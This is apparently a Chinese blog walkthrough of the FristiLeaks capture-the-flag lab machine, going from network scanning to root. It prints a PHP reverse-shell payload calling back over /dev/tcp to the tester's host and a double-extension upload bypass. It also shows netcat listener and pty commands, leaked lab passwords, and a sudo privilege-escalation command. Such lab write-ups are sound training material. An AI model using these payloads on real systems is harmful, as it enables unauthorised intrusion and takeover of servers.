FristiLeaks靶机渗透测试

先对目标靶机的网段进行扫描,用nmap命令

nmap -sS 10.9.63.0/24

在这里插入图片描述
发现目标IP为10.9.63.158(每个人扫描的ip在不同网段都不一样,根据自身情况进行甄别)看看都开启了哪些端口,发现有80端口开放,打开网页输入ip进行查看
![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/7a6b712377c6446c8bcc3ec082c296dd.png

进入页面发现是一个html的网页,查看页面有哪些可以利用的元素,按F12查看元素
在这里插入图片描述
发现没有什么可以利用的信息,尝试在ip后面加一下图片后面的信息,发现fristi可以进入
在这里插入图片描述
进入到登录页面检查元素F12,发现有一串注释的代码,仔细看发现是用Base64进行编译的
在这里插入图片描述
在这里插入图片描述
解码工具对密钥进行base64解密
在这里插入图片描述
得到一个图片,上面可能是登录密码,猜的下面这个文字是用户名,尝试登录一下
在这里插入图片描述
在这里插入图片描述
发现可以登录成功,里面是一个上传文件的地方
在这里插入图片描述
在这里插入图片描述
尝试一下用上传反弹shell进入后台,编写一个php文件,ip写上自己kali的ip,后面写一个端口号

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.63.146/1234 0>&1'");?>

新建一个文件,lmx.php.png,把上面的代码写入,选择文件进行上传(之前实验过只能上传图片格式:jpg、png、gif等)编译器是从左往右进行编译,先编译php的
在这里插入图片描述
得到上传文件的路径
在这里插入图片描述
在ip后面输入路径加上你创建的文件夹名称进入页面,在kali里面输入nc -lvvp端口号,网站重新进入,就可以利用shell反弹进入后台

nc -lvvp 1234

在这里插入图片描述
进入之后可以输入python -c "import pty;pty.spawn(‘/bin/bash’) ",进入交互模式

python -c "import pty;pty.spawn('/bin/bash') "

在这里插入图片描述
用命令cd /home 进入家目录

cd /home

用命令ls 查看有什么用户
在这里插入图片描述
发现有admin用户,ls进入admin用户,发现有两个txt的文件,cat一下查看一下
在这里插入图片描述
发现得到了两串密钥

=RFn0AKnlMHMPIzpyuTI0ITG、mVGZ3O3omkJLmy2pcuTq

再cat一下py文件
在这里插入图片描述
发现是用这个加密方式进行加密的,用python或者是问gpt进行解密,得到两个密码

LetThereBeFristi!
thisisalsopw123

在这里插入图片描述
发现thisisalsopw123这个是admin用户的密码,LetThereBeFristi!这个是fristigod用户的密码,用su fristigod登录到这个用户,密码是LetThereBeFristi!,whoami查看一下用户

su fristigod

在这里插入图片描述
用sudo -l查看用户可以使用的sudo权限,发现有一个可以使用的

sudo -l

在这里插入图片描述
使用sudo -u指定用户,接上后面可以使用的root命令,最后加上/bin/bash进行提权

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

在这里插入图片描述
发现已经是管理员权限了,进入根下root,发现Flag!cat一下,胜利啦!!
在这里插入图片描述

  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值